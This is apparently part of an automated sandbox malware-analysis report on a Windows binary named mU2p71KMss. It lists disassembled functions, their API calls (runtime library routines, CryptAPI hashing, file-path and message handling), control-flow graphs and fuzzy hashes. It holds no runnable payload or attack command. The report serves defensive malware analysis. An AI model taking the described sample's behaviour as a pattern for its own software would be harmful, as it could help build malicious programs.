                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1060 423b4c-423b52 1061 423b61-423b64 call 420c62 1060->1061 1063 423b69-423b6c 1061->1063 1064 423b54-423b5f call 42793d 1063->1064 1065 423b6e-423b71 1063->1065 1064->1061 1068 423b72-423bb2 call 430d21 call 430eca call 430d91 1064->1068 1075 423bb4-423bba call 422587 1068->1075 1076 423bbb-423bbf 1068->1076 1075->1076
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00423B64
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                  • String ID: bad allocation
                                                                                                  • API String ID: 3074076210-2104205924
                                                                                                  • Opcode ID: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                                                                                                  • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                  • Opcode Fuzzy Hash: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                                                                                                  • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1079 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                  APIs
                                                                                                  • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                    • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                    • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                  • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2427264223-472376889
                                                                                                  • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                  • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                  • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                  • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1082 40ef50-40ef7a call 420c62 1085 40efdc-40efe2 1082->1085 1086 40ef7c 1082->1086 1087 40ef80-40ef85 call 420c62 1086->1087 1089 40ef8a-40efbd call 42b420 1087->1089 1092 40efc0-40efcf 1089->1092 1092->1092 1093 40efd1-40efda 1092->1093 1093->1085 1093->1087
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0040EF69
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _malloc.LIBCMT ref: 0040EF85
                                                                                                  • _memset.LIBCMT ref: 0040EF9B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$AllocateHeap_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3655941445-0
                                                                                                  • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                  • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                                                                                                  • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                  • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00413A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1094 413a90-413ab0 1095 413ab2-413ab8 1094->1095 1096 413af8-413afd 1094->1096 1097 413b00-413b05 call 44f23e 1095->1097 1098 413aba-413ac2 call 423b4c 1095->1098 1102 413b0a-413b0f call 44f1bb 1097->1102 1101 413ac7-413ace 1098->1101 1101->1102 1103 413ad0-413ae0 1101->1103 1106 413ae2-413af1 1103->1106 1107 413af4-413af7 1103->1107 1106->1107 1107->1096
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A
                                                                                                    • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 657562460-3788999226
                                                                                                  • Opcode ID: f5f01b68dbda021ca42eecc7f725211f068217be071155698f767f535e80c005
                                                                                                  • Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
                                                                                                  • Opcode Fuzzy Hash: f5f01b68dbda021ca42eecc7f725211f068217be071155698f767f535e80c005
                                                                                                  • Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1108 42fb64-42fb77 call 428520 1111 42fba5-42fbaa call 428565 1108->1111 1112 42fb79-42fb8c call 428af7 1108->1112 1117 42fb99-42fba0 call 42fbab 1112->1117 1118 42fb8e call 42fe47 1112->1118 1117->1111 1121 42fb93 1118->1121 1121->1117
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0042FB7B
                                                                                                    • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                    • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                    • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                  • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                    • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                    • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                    • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                    • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                    • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                    • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1282695788-0
                                                                                                  • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                  • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                  • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                  • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1122 427f3d-427f47 call 427e0e 1124 427f4c-427f50 1122->1124
                                                                                                  APIs
                                                                                                  • _doexit.LIBCMT ref: 00427F47
                                                                                                    • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2158581194-0
                                                                                                  • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                  • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1125 412900-41298f call 413a90 MultiByteToWideChar call 418400 1130 412991-412997 call 422587 1125->1130 1131 41299a-41299e 1125->1131 1130->1131 1133 4129a0-4129a8 call 422587 1131->1133 1134 4129ab-4129bd 1131->1134 1133->1134
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-00000400,-00000400), ref: 00412966
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 626452242-0
                                                                                                  • Opcode ID: 9923f7c5fc9e2703d867ea7c919ad7633f5c387dee158893e4253aa1c6881e72
                                                                                                  • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                                                                                                  • Opcode Fuzzy Hash: 9923f7c5fc9e2703d867ea7c919ad7633f5c387dee158893e4253aa1c6881e72
                                                                                                  • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                  • _memset.LIBCMT ref: 004110CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                  • _malloc.LIBCMT ref: 00411100
                                                                                                  • _memset.LIBCMT ref: 0041110B
                                                                                                  • _sprintf.LIBCMT ref: 0041112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  • Opcode ID: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                                                                                                  • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                  • Opcode Fuzzy Hash: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                                                                                                  • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00411915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                  • _memset.LIBCMT ref: 004119B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                    • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  • API String ID: 4182478520-946485432
                                                                                                  • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                  • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                  • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                  • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                    • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                  • _memmove.LIBCMT ref: 0040F9EA
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                  • _memmove.LIBCMT ref: 0040FADA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  • Opcode ID: fcdb3c65d237faf0aacdec3d6eb45a8278326906d3b88b2002ac43bdb553a6d9
                                                                                                  • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                  • Opcode Fuzzy Hash: fcdb3c65d237faf0aacdec3d6eb45a8278326906d3b88b2002ac43bdb553a6d9
                                                                                                  • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                  • _memset.LIBCMT ref: 0040E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                  • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1084002244-213608013
                                                                                                  • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                  • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB17
